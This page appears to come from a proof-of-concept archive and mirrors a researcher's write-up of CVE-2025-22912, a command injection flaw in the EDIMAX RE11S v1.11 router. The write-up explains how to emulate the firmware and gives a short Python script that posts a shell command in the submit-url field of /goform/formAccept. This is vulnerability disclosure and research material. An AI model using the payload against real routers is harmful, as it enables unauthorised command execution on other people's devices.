Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2025-22912 PoC — EDIMAX RE11S 安全漏洞

Source
https://github.com/passwa11/RE11S_1.11-formAccept-CommandInjection
Associated Vulnerability
Title:EDIMAX RE11S 安全漏洞 (CVE-2025-22912)
Description:RE11S v1.11 was discovered to contain a command injection vulnerability via the component /goform/formAccept.
Description
CVE-2025-22912
Readme
# RE11S_1.11-formAccept-CommandInjection

During my internship at Qi An Xin Tiangong Lab, I discovered a  command injection vulnerability in the RE11S_1.11 router.

By analyzing the webs file in the bin directory, I found that the function formAccept contains a command injection vulnerability.

The command injection can be triggered by the submit-url key value, which leads to a system command injection.

![image-20241224100434040](https://gitee.com/xyqer/pic/raw/master/202501030933763.png)

## How can we simulate a router

Use the following command to simulate with firmAE.

```bash
sudo ./run.sh -r v1 ~/IOT/RE11S_1.11/RE11S_1.11.bin
```

The content of the **poc.py** file is as follows:

```python
import requests

url = "http://192.168.9.2/goform/formAccept"
data = {
	"submit-url":"touch /tmp/xyq"
}

r = requests.post(url,data=data)
print(r.text)
```

## Attack result

![image-20241224100515030](https://gitee.com/xyqer/pic/raw/master/202412301812486.png)

It can be seen that a /tmp/xyq file is added after the execution, which proves that the attack is successful.
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →